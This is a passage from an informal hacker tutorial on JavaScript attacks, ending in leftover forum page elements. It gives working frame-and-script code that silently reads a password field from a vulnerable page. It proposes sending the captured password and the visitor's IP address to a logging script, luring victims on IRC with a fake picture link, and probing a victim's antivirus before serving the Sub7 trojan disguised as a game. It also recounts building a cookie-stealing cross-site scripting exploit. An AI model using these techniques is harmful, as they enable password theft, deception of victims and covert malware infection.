window.vulnscript.document.writeln(thehtml.substring(thehtml.indexOf('<TABLE
border=0 cellPadding=0 cellSpacing=3 width=90%>')-1,
thehtml.indexOf('</html>')+7));
window.vulnscript.document.close();
}
//-->
</script>
</html>
-------- end --------
of course in real use the size of the cols would be set
so frame #2 (vulnscript) would be 0%.. So that the user
wouldn't even know what is happening.
Now this is what the fuckca.html is:
-------- begin --------
<html><body>
<script type="text/javascript">
<!--
var name1 = parent.vulnscript.document.forms[0].pass1.value;
parent.blah.document.write(name1);
//-->
</script>
</body></html>
-------- end --------
all this does is print out the value of the first (unnamed)
form from the frame named vulnscript (the one that has
the page where we want to steal data from).
This is what their userconfig.pl displayed that we were
grabbing:
Password : <INPUT TYPE="password" SIZE=45 NAME="pass1"
MAXLENGTH=16 value="testpass">
The problem is that it would display the password in plain
text (value="testpass" - testpass is the password) why
it did this I don't know, stupid programming I guess.
But if you got a hold of someone's cookie you could view
that script and it would give you the pass.. So what this
little trick with frames and javascript does is make users
visit the page without knowing and then lets our javascript
grab their password. Instead of printing the password
to frame #1 (name=blah) we could have sent an invisible
frame to a script which logs input. Example:
instead of
parent.blah.document.write(name1);
have
parent.vulnscript.location.replace(log.cgi?name1);
I would then tell a few people who I want passwords from
about this page, say "hey, want to see a picture of my
girlfriend?" (All hackX0r guys like pics of girls) then
I would just put up some stupid pic.. Maybe Britney Spears
or something. The log.cgi would log both name1 (their
password) and $ENV{'REMOTE_ADDR'} (their ip address).
This would let me match up usernames to passwords fairly
easy. You could also get their username from grabbing
it off the page, or from the contents of the cookie.
This attack is fairly complicated, so I didn't explain
why I did a few things. I figure anyone who could actually
pull this off would understand why. Also not many sites
are vuln to this, and even the ones that are usually the
attacker does not have the ability to hop on the irc channel
and trick people into viewing it.
Ok, this is probably the least likely technique in this
tutorial to be used. All the rest can be used fairly
often. This one is used to gain enough info on someone
in order to form a trojan attack on them. What this javascript
will allow us to do is to probe their system and see if
they have any security against our attack. It will let
us see what anti-virus program they use, what firewall
they use, and if they have any programs that allow us
to infect them with macros.
This was originally a bugtraq post: ( http://www.securityfocus.com/archive/1/224673
) with a link to the example at http://geocities.com/dzzie/sys_snoop1.html
but we are going to probe for more security related
programs. (put a probe for anti-virus programs, firewalls,
word, adobe acrobat [pdf])
Lets say we check for anti-virus programs, if they don't
have any you can display a link to download sub7 and say
it is a video game... if they do have an anti-virus program
you can display the link to the real game. This way you
don't have to worry about the user finding out that you
tried to send them a trojan. Only users who don't have
an anti-virus program will have downloaded the trojan.
One possible future for trojan's is modules that you can
insert to attack specific programs. For instance if you
know the user is running a certain type of anti-virus
program and they are running a certain type of firewall
you can plug those modules into the trojan. When the
user downloads and runs this trojan the modules will trojan
those anti-virus and firewall making them seem as if they
are running fine, when they aren't. Ether they won't
detect your trojan or they will replace them with a emtpy
program that just puts the icons in the taskbar and task
list. I will try to get a working deminstration of how
javascript can be used to download the correct trojan
for a user's system or detect if the trojan will be detected
by an anti-virus program so it will make them download
a regular file.
If you have a firewall or anti-virus program please send
me the full address (absolute address) to all the images
it has. email the list to b0iler@hotmail.com What the
javascript will do is try and load that image, if it does
then ie will return a true value, if it doesn't ie will
return false and we will know the user does not have that
software installed. When I get enough info on the main
anti-virus and main firewalls I will put together the
code and explain it better.
This section isn't really done, but I am getting sick
of writing so I guess I'll have to finish it later. All
I am going to do is add a demo of how to check for anti-virus
programs.
I have decided to add a section here of a few interesting
javascript hacks I have heard about and seen. Since normal
web site defacments and such are full of script kiddies
who just ./own site.com with no creativity or thought
I like to hear a nice story of hackers coming up with
cool ways to manipulate systems and people.
First story is about a webgame called redlite
(taken from a tutorial I wrote a few weeks ago)
What happend was that a friend of mine found his first
exploit and with the help of someone else coding it -
got it to work really good. Before I continue with the
story you'll need to know alittle bit about the situation.
In #b0g on us.undernet.org, a place where I hang out sometimes
there is alot of people into this online game called redlite
. The object of the game is to fight people in an
online version of a drug war. You have crack, hoes, guns,
money, and the like. Now a few days prior to this I was
about to sign up for it just to see what all the fuss
was about, as I was signing up I saw that the registration
script prints what is inputted to it. The script also
didn't filter anything but ' and " from the input, so
it could be used to steal cookies from users. I coded
up the exploit and tested it... everything worked fine.
But I never found out if you can do anything with just
a user's cookie. And I didn't really care about the game,
so the exploit never really got used. When I went back
into #b0g xhaze and tak, two redlite players and b0g gimps
had found another script that prints something to a page.
The page that it prints to is their player |
|
|
 |
| |
Security Forum & Discussion Topics |
|
| |
|
|
|
|
| |
| |
| |
&nb | |
